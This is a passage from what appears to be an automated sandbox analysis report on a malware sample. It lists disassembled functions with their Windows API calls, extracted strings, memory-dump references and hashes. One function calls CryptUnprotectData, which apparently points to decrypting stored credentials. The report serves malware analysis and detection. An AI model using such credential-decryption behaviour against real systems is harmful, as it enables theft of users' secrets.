                                • Instruction Fuzzy Hash: 12A206F3A082149FE3046E2DEC9567ABBE9EF94720F1A493DEAC4C7344E63558058693
                                Function 009CCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(009DB110,00000000,00000001,009DB100,?), ref: 009CCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009CCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 009CCBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: e89acc9d286b0abdddbf81055ad9d7194d2ef52cc4d71027bf6bdc08e71a9aa9
                                • Instruction ID: dcc1ae75b50e756fe502eca4fbb46a5e745cf81392a252bf48efa6d8bd3fbc4c
                                • Opcode Fuzzy Hash: e89acc9d286b0abdddbf81055ad9d7194d2ef52cc4d71027bf6bdc08e71a9aa9
                                • Instruction Fuzzy Hash: 39317871A40619BFD710DB94CC82FA977B9DB88B11F104188FA08EB2D0D7B0AD44CB91
                                Function 009B9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009B9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009B9BB3
                                • LocalFree.KERNEL32(?), ref: 009B9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 20eb96efff1657a0feab34464eb52b9f923785938dd9b3122e6d367b6eeb968e
                                • Instruction ID: 08dcd0bf501c9535f6114fbf84efd492f315a87521a95eb89e293a1b9d299fb2
                                • Opcode Fuzzy Hash: 20eb96efff1657a0feab34464eb52b9f923785938dd9b3122e6d367b6eeb968e
                                • Instruction Fuzzy Hash: CA011DB5A4121AAFE710DBA4DC55FABB77CEB44B00F104554EA04AB281DBB09E00CBE1
                                Function 00DF95D4 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: BMU$roZ$voZ
                                • API String ID: 0-2172260609
                                • Opcode ID: 1b4fbeaac32e97fa1cecb77ce68721dee955fb8bcf1a4b38ac72407ab4f6bac2
                                • Instruction ID: 6509ec1c707184c2611a53334382eb02b633fe6205ffeaf6056440f6fdcdf85a
                                • Opcode Fuzzy Hash: 1b4fbeaac32e97fa1cecb77ce68721dee955fb8bcf1a4b38ac72407ab4f6bac2
                                • Instruction Fuzzy Hash: 9151BFB2A0C6189FE3157A18DC517BAF7E8EB45310F16892DEBC287300E632981497E7
                                Function 00CAB864 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (+JM
                                • API String ID: 0-1914792814
                                • Opcode ID: dae2190c3786a5afb5839b95c8c57fdd7caf61b620c63b7268d53e33ee422454
                                • Instruction ID: 0b9305ea5e43afe4d56789c82e68fec2f735cafd3158c3c71bcac04b6ce07e10
                                • Opcode Fuzzy Hash: dae2190c3786a5afb5839b95c8c57fdd7caf61b620c63b7268d53e33ee422454
                                • Instruction Fuzzy Hash: 27514CF3A083005FE304AE2DECC576AB7D6EBD4320F1B463EEA8587784E97558058796
                                Function 00D50970 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >%>
                                • API String ID: 0-1451704855
                                • Opcode ID: 970e64d356b2d3c8b186ed4072e0291f71a8fc79134b5122e2af04fdece36e2d
                                • Instruction ID: a48e3f8752f72b9b34dfe6194542679b5f1b9f5758b1f082d98a5b3158ccf9c9
                                • Opcode Fuzzy Hash: 970e64d356b2d3c8b186ed4072e0291f71a8fc79134b5122e2af04fdece36e2d
                                • Instruction Fuzzy Hash: BE518BF3F187145BE3049A6ADC847A7B6CBDBD4720F1A813DDA88C7748E9795C0542C2
                                Function 00C0D192 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !P^
                                • API String ID: 0-3632790718
                                • Opcode ID: a51ab82dee14197c59218fdaa54465ceb898348f15212c2562d7c08a81082082
                                • Instruction ID: 77f403ad7b3a12be194474b2f77fc39bfb2afed44758d45cf2d4bf06463a9c5a
                                • Opcode Fuzzy Hash: a51ab82dee14197c59218fdaa54465ceb898348f15212c2562d7c08a81082082
                                • Instruction Fuzzy Hash: 675158F7F041105BF304592ADC89766B69BDBE4320F3B863DEE8897788D9794C064291
                                Function 00C7FE5C Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tG'~
                                • API String ID: 0-3719601612
                                • Opcode ID: 20fb095b5f0eac7d3d0bda6bb5adff7dc17a051ceb6c5f2d2936f2fc0fae20ff
                                • Instruction ID: 5fcf83bab7e2d39a85dc3e8a82864f566bf0d4404731b6a01cf0abe15ce0ce9a
                                • Opcode Fuzzy Hash: 20fb095b5f0eac7d3d0bda6bb5adff7dc17a051ceb6c5f2d2936f2fc0fae20ff
                                • Instruction Fuzzy Hash: 0251D7F360C6049FE708BE29EC8973ABBD6EBD4320F26863DD6C547784ED3558458286
                                Function 00D17F39 Relevance: .3, Instructions: 266COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf8b78b1b1274bf442f39f0e7c10e7d8b433cef0944406edb67d5d6eee4a53b8
                                • Instruction ID: f9033337d742c75a97837135d4ef7526d3a5dc45e370ff5fcdc51d0e0d98a4e2
                                • Opcode Fuzzy Hash: cf8b78b1b1274bf442f39f0e7c10e7d8b433cef0944406edb67d5d6eee4a53b8
                                • Instruction Fuzzy Hash: 328138B391D6145FE304AE3CDC85376BBD5EB94324F2A863DEAC4D7384E979980082C6
                                Function 00C9CA03 Relevance: .2, Instructions: 184COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a407ebe5480351b6b35f47e05e00de2b32386513562a7c41967a9f67768bcb49
                                • Instruction ID: b0b5b0def7ee0f84861ee57081d5a1f093e91bbc0f59ed13f5fd7933aef0e3d9
                                • Opcode Fuzzy Hash: a407ebe5480351b6b35f47e05e00de2b32386513562a7c41967a9f67768bcb49
                                • Instruction Fuzzy Hash: 5D519FF290C6049FE715AE29EC8577AF7E5EF98320F16893DD7C483744EA3558048A87
                                Function 00D21B12 Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb62786634508c4a78b203fdc083179c60dec3d54f891109a0b4f7e8a1949db
                                • Instruction ID: 588db79c240ff41e5ad21364f7cbd194acc2b6ae8d64bc26b401e3768bb965bb
                                • Opcode Fuzzy Hash: ecb62786634508c4a78b203fdc083179c60dec3d54f891109a0b4f7e8a1949db
                                • Instruction Fuzzy Hash: D5412BF39087185FE304AE28EC956B6B7D5EB94320F1A863DEAC593784FD7654048242
                                Function 00C5CDDD Relevance: .1, Instructions: 110COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4968438efef507c94f0d7337039705d717f81d80a763be5ad127cdc6cdfa42c
                                • Instruction ID: 2e65006dd97522a87116cf0cd1b57cdd170d9f71934e987083eaf0bb49fb63b3
                                • Opcode Fuzzy Hash: a4968438efef507c94f0d7337039705d717f81d80a763be5ad127cdc6cdfa42c
